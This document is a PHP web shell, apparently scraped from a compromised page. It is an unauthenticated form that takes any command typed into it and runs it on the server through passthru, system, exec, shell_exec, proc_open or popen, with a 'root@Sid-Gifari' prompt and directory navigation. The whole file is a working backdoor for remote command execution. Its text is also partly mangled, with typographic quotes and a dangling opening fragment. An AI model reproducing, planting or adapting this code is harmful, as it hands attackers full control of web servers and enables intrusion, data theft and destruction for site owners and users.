<html><td>
<?= htmlspecialchars
session_start();

// Allowed functions
$execFunctions = [‘passthru’, ‘system’, ‘exec’, ‘shell_exec’, ‘proc_open’, ‘popen’];

// Check if at least one is available
$canExecute = false;
foreach ($execFunctions as $func) {
if (function_exists($func)) {
$canExecute = true;
break;
}
}

// Initialize cwd
if (!isset($_SESSION[‘cwd’])) {
$_SESSION[‘cwd’] = getcwd();
}

// Change directory if POSTed
if (isset($_POST[‘path’]) && is_dir($_POST[‘path’])) {
$_SESSION[‘cwd’] = realpath($_POST[‘path’]);
}

$cwd = $_SESSION[‘cwd’];
$output = “”;

// Process terminal input
if (isset($_POST[‘terminal’])) {
$cmdInput = trim($_POST[‘terminal-text’]);

// Handle cd
if (preg_match(‘/^cd\s*(.*)$/’, $cmdInput, $matches)) {
$dir = trim($matches[1]);

if ($dir === ” || $dir === ‘~’) {
$dir = $_SERVER[‘DOCUMENT_ROOT’] ?? $cwd;
} elseif ($dir[0] !== ‘/’ && $dir[0] !== ‘\\’) {
$dir = $cwd . DIRECTORY_SEPARATOR . $dir;
}

$realDir = realpath($dir);

if ($realDir && is_dir($realDir)) {
$_SESSION[‘cwd’] = $realDir;
$cwd = $realDir;
$output = “Changed directory to ” . htmlspecialchars($realDir);
} else {
$output = “bash: cd: ” . htmlspecialchars($matches[1]) . “: No such file or directory”;
}

} else {

if ($canExecute) {

// Change working directory
chdir($cwd);

// Allow safe characters; do NOT break arguments
$cmd = $cmdInput . ” 2>&1″;

// PRIORITY: passthru first
if (function_exists(‘passthru’)) {
ob_start();
passthru($cmd);
$output = ob_get_clean();

} elseif (function_exists(‘system’)) {
ob_start();
system($cmd);
$output = ob_get_clean();

} elseif (function_exists(‘exec’)) {
exec($cmd, $out);
$output = implode(“\n”, $out);

} elseif (function_exists(‘shell_exec’)) {
$output = shell_exec($cmd);

} elseif (function_exists(‘proc_open’)) {
$pipes = [];
$process = proc_open($cmd, [
0 => [“pipe”, “r”],
1 => [“pipe”, “w”],
2 => [“pipe”, “w”]
], $pipes, $cwd);

if (is_resource($process)) {
fclose($pipes[0]);
$output = stream_get_contents($pipes[1]);
fclose($pipes[1]);
$output .= stream_get_contents($pipes[2]);
fclose($pipes[2]);
proc_close($process);
} else {
$output = “Failed to execute command via proc_open.”;
}

} elseif (function_exists(‘popen’)) {
$handle = popen($cmd, ‘r’);
if ($handle) {
$output = stream_get_contents($handle);
pclose($handle);
} else {
$output = “Failed to execute command via popen.”;
}

} else {
$output = “Error: No command execution functions available.”;
}

} else {
$output = “Command execution functions are disabled on this server.”;
}
}
}

if (!isset($url_inc)) $url_inc = htmlspecialchars($_SERVER[‘PHP_SELF’]);
if (!isset($path)) $path = $cwd;
?>

<strong>root@Sid-Gifari:<?php echo htmlspecialchars($cwd); ?>$</strong><br>
<pre><?php echo htmlspecialchars($output); ?></pre>

<form method=”post” action=”<?php echo $url_inc; ?>”>
<input type=”text” name=”terminal-text” size=”30″ placeholder=”Cmd” />
<input type=”hidden” name=”path” value=”<?php echo htmlspecialchars($path); ?>” />
<input type=”submit” name=”terminal” value=”Execute” />
</form></html>